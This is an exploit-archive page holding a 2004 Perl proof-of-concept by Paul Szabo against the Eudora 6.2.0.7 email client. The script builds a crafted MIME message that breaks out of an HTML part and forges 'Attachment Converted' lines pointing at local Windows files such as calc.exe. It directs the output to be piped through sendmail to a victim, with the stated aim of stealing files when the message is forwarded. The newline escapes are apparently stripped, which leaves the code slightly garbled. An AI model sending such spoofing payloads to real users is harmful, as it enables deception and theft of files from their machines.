[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Eudora 6.2.0.7 Attachment Spoofer Exploit
# Published : 2004-10-11
# Author : Paul Szabo
# Previous Title : Icecast <= 2.0.1 Win32 Remote Code Execution Exploit
# Next Title : MS Windows JPEG GDI+ All-In-One Bind/Reverse/Admin/FileDownload
#!/usr/bin/perl --
use MIME::Base64;
print "From: men";
print "To: youn";
print "Subject: Eudora 6.2.0.7 on Windows spoofn";
print "MIME-Version: 1.0n";
print "Content-Type: multipart/mixed; boundary="zzz"n";
print "X-Use: Pipe the output of this script into: sendmail -i victimnn";
print "--zzzn";
print "Content-Type: text/plainn";
print "Content-Transfer-Encoding: 7bitnn";
print "With spoofed attachments, we could 'steal' files (after a warning?)
if the message was forwarded (not replied to).n";
print "n--zzzn";
print "Content-Type: text/html; name="qp.txt"n";
print "Content-Transfer-Encoding: quoted-printable n";
print "Content-Disposition: inline; filename="qp.txt"nn";
print "Within text/html part, use </x-html> to get back to plaintext,
no need for NUL or linebreak or nothing:
</x-html>n";
print "Attachment Converted=00: "c:\winnt\system32\calc.exe"n";
print "Attachment Converted=
: "c:\winnt\system32\calc.exe"n";
print "Attachment Converted: "c:\winnt\system32\calc.exe"n";
print "n--zzz--n";
# www.Syue.com [2004-10-11]